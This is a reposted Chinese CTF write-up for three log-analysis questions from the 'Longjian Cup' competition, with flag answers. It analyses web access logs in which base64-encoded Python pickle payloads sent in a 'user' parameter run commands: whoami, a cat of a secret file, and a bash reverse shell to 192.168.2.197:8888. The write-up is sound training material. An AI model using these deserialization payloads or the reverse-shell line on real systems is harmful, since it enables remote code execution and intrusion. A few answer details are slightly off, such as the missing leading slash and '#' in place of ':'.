全网最新最全首届“陇剑杯”网络安全大赛完整WIRTEUP --- 简单日志分析(3题) - 走看看

zoukankan html css js c++ java

全网最新最全首届“陇剑杯”网络安全大赛完整WIRTEUP --- 简单日志分析(3题)

题目描述

某应用程序被攻击，请分析日志后作答：

7.1 　　黑客攻击的参数是______。（如有字母请全部使用小写）

wp：

去除404剩下的就是我们要分析的

127.0.0.1 - - [07/Aug/2021 10:43:12] "GET /?user=STAKcDAKMFMnd2hvYW1pJwpwMQowKGcwCmxwMgowKEkwCnRwMwowKGczCkkwCmRwNAowY29zCnN5c3RlbQpwNQowZzUKKGcxCnRSLg== HTTP/1.1" 500 -（base64解码user值后 =为whomai）

127.0.0.1 - - [07/Aug/2021 10:43:12] "GET /?user=STAKcDAKMFMnY2F0IC9UaDRzX0lTX1ZFUllfSW1wb3J0X0ZpMWUnCnAxCjAoZzAKbHAyCjAoSTAKdHAzCjAoZzMKSTAKZHA0CjBjb3MKc3lzdGVtCnA1CjBnNQooZzEKdFIu HTTP/1.1" 500 -（cat /Th4s_IS_VERY_Import_Fi1e）

127.0.0.1 - - [07/Aug/2021 10:43:12] "GET /?user=STAKcDAKMFMnYmFzaCAtaSA%2bJiAvZGV2L3RjcC8xOTIuMTY4LjIuMTk3Lzg4ODggMD4mMScKcDEKMChnMApscDIKMChJMAp0cDMKMChnMwpJMApkcDQKMGNvcwpzeXN0ZW0KcDUKMGc1CihnMQp0Ui4= HTTP/1.1" 500 -（bash -i >& /dev/tcp/192.168.2.197/8888 0>&1）

flag：

user，这里我以为是命令的参数，其实是url的参数

7.2　　黑客查看的秘密文件的绝对路径是_____________。

wp:

请看上题
flag:

Th4s_IS_VERY_Import_Fi1e

7.3　　黑客反弹shell的ip和端口是_____________。（格式使用“ip:端口"，例如127.0.0.1:2333）

wp:

请看上题
flag:

192.168.2.197#8888

查看全文

相关阅读:
js常用设计模式实现（一）单例模式
 js深入（四）万脸懵圈的this指向
 js深入（三）作用域链与闭包
 js深入（二）函数的执行与上下文
 js深入（一）从原型理解原型链
 初识markdown
git stash 用法
 见的如T、E、K、V等形式的参数常用于表示泛型形参
 SystemBarTint是两年以前的一个开源库，现在我们依然可以用它很方便的给应用加上。
android:supportsRtl="true" 属性

原文地址：https://www.cnblogs.com/GKLBB/p/15305671.html

Copyright © 2011-2022 走看看